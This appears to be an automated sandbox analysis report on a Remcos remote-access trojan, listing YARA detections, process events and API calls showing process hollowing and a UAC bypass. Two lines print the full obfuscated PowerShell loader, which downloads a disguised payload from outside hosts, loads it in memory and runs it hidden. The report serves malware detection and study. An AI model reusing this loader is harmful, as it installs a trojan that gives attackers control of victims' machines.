                      Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 3840, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,11_2_0041812A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,11_2_0041330D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,11_2_0041BBC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,11_2_0041BB9A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00401806 NtdllDefWindowProc_W,12_2_00401806
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004018C0 NtdllDefWindowProc_W,12_2_004018C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004167EF
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_029FAC249_2_029FAC24
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043706A11_2_0043706A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041400511_2_00414005
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E11C11_2_0043E11C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004541D911_2_004541D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004381E811_2_004381E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041F18B11_2_0041F18B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044627011_2_00446270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E34B11_2_0043E34B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004533AB11_2_004533AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042742E11_2_0042742E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043756611_2_00437566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E5A811_2_0043E5A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004387F011_2_004387F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043797E11_2_0043797E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004339D711_2_004339D7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DA4911_2_0044DA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427AD711_2_00427AD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041DBF311_2_0041DBF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427C4011_2_00427C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00437DB311_2_00437DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00435EEB11_2_00435EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043DEED11_2_0043DEED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00426E9F11_2_00426E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1001719411_2_10017194
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1000B5C111_2_1000B5C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B04012_2_0044B040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043610D12_2_0043610D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044731012_2_00447310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A49012_2_0044A490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040755A12_2_0040755A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043C56012_2_0043C560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B61012_2_0044B610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044D6C012_2_0044D6C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004476F012_2_004476F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044B87012_2_0044B870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044081D12_2_0044081D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041495712_2_00414957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004079EE12_2_004079EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407AEB12_2_00407AEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044AA8012_2_0044AA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00412AA912_2_00412AA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404B7412_2_00404B74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404B0312_2_00404B03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044BBD812_2_0044BBD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404BE512_2_00404BE5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404C7612_2_00404C76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00415CFE12_2_00415CFE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00416D7212_2_00416D72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00446D3012_2_00446D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00446D8B12_2_00446D8B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406E8F12_2_00406E8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040503814_2_00405038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041208C14_2_0041208C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004050A914_2_004050A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040511A14_2_0040511A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043C13A14_2_0043C13A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004051AB14_2_004051AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044930014_2_00449300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040D32214_2_0040D322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A4F014_2_0044A4F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043A5AB14_2_0043A5AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041363114_2_00413631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044669014_2_00446690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A73014_2_0044A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004398D814_2_004398D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004498E014_2_004498E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A88614_2_0044A886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DA0914_2_0043DA09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00438D5E14_2_00438D5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449ED014_2_00449ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041FE8314_2_0041FE83
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00430F5414_2_00430F54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004050C215_2_004050C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004014AB15_2_004014AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040513315_2_00405133
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004051A415_2_004051A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040124615_2_00401246
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040CA4615_2_0040CA46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040523515_2_00405235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004032C815_2_004032C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040168915_2_00401689
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402F6015_2_00402F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
